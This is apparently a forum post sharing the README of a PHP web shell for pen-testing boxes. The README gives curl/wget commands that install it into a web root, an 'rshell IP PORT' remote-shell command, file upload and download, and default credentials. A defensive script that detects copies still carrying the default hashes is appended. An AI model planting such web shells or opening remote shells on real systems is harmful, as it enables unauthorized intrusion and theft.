Sooo, I am getting a bit exhausted with people’s reverse shells crashing boxes (also shuffling through them to find one that works). Here is a nice web shell that gives you a terminal-like page to execute basic commands from. It’s not a TRUE reverse shell but it is good enough for most of the things you will do here at least. Enjoy,
php-shell
A simple, intuitive, feature-rich PHP web shell for pen testing.
Usage
To download, use one of the following (or similar):
curl -L https://github.com/eb3095/php-shell/raw/master/php-shell.php > /var/www/html/php-shell.php
wget https://github.com/eb3095/php-shell/raw/master/php-shell.php -O /var/www/html/php-shell.php
From there, just visit the website with /php-shell.php at the end and enjoy your web-based shell from the host!
Controls
- Arrow Up: History up
- Arrow Down: History down
- Enter: Run command
- Click Anywhere: Focus command prompt
History is not saved across sessions and is stored locally in the browser for the time being.
Commands
- exit: Log out
- cd: Change directory
- cls: Clear the screen
- rshell: “rshell IP PORT” opens a remote shell to the specified address
- upload: Shows a file prompt, then uploads the file to the current directory
- download: “download FILE” downloads a file, given either a relative or a full path
cd is a special case. If you run the following,
cd /home; ls
the whole line is executed as an SH/BASH command, and the cd does not set the current working directory outside of that exec. However,
cd /home
on its own is executed as an internal command that sets the PHP cwd, and the change is permanent (until refresh).
Credentials
The defaults are:
- Username: user
- Password: pass
The username and password are both hashed with SHA-512, and the hashes are set directly in the file.
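
Because the defaults are fixed and the hashes live in the file itself, a copy left on a web root with unchanged credentials can be found by content. The following is an added example, not part of php-shell: it assumes the file stores unsalted hex SHA-512 digests (the README only says "hashed via sha512"), and the function names `sha512_hex` and `find_default_creds` are made up for this sketch.

```shell
#!/bin/sh
# Added example: flag PHP files that still embed the default php-shell
# credentials (user / pass).
# Assumption: the digests are stored as unsalted hex SHA-512 strings.

# Hex SHA-512 of the exact string given (no trailing newline hashed).
sha512_hex() {
    printf '%s' "$1" | sha512sum | awk '{print $1}'
}

# find_default_creds WEBROOT
# Prints every *.php file under WEBROOT that contains BOTH default digests.
find_default_creds() {
    root="$1"
    user_hash="$(sha512_hex 'user')"
    pass_hash="$(sha512_hex 'pass')"
    # First pass: files containing the username digest (-i: hex case unknown).
    find "$root" -type f -name '*.php' \
        -exec grep -liF -- "$user_hash" {} + 2>/dev/null |
    while IFS= read -r f; do
        # Second pass: the same file must also contain the password digest.
        if grep -qiF -- "$pass_hash" "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Stand-alone use: sh this-script.sh /var/www/html
if [ "$#" -gt 0 ]; then
    find_default_creds "$1"
fi
```

A hit means the file is reachable with user/pass; matching on the digests rather than the filename also catches renamed copies.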